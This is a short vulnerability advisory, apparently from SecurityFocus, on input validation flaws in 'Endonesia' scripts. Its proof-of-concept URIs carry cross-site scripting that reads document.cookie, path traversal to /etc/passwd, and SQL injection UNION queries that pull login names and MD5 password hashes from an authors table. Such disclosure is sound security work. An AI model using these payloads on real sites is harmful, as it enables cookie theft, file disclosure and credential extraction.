Endonesia Multiple Scripts Multiple Input Validation Vulnerabilities

An attacker can exploit these vulnerabilities via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/en/mod.php?mod=[XSS]&op=viewlink&cid=5
http://www.example.com/en/friend.php your Friend:[XSS]
http://www.example.com/en/admin.php Main Text: [XSS]
http://www.example.com/en/mod.php?mod=informasi&op=showinfo&intypeid=><script>document.write(document.cookie)</script>
http://www.example.com/en/mod.php?mod=../../../../../etc/passwd%00
http://www.example.com/en/mod.php?mod=diskusi&op=viewdisk&did=-4%20union%20select%200,0,name,0,pwd,0,0%20from%20authors/* - LOGIN AND PASS (MD5)
http://www.example.com/en/mod.php?mod=katalog&op=viewlink&cid=-2%20union%20select%200,pwd,0%20from%20authors%20where%20counter=1/*
http://www.example.com/en/mod.php?mod=diskusi&op=viewcat&cid=-2%20union%20select%200,0,0/*


 

Privacy Statement
Copyright 2010, SecurityFocus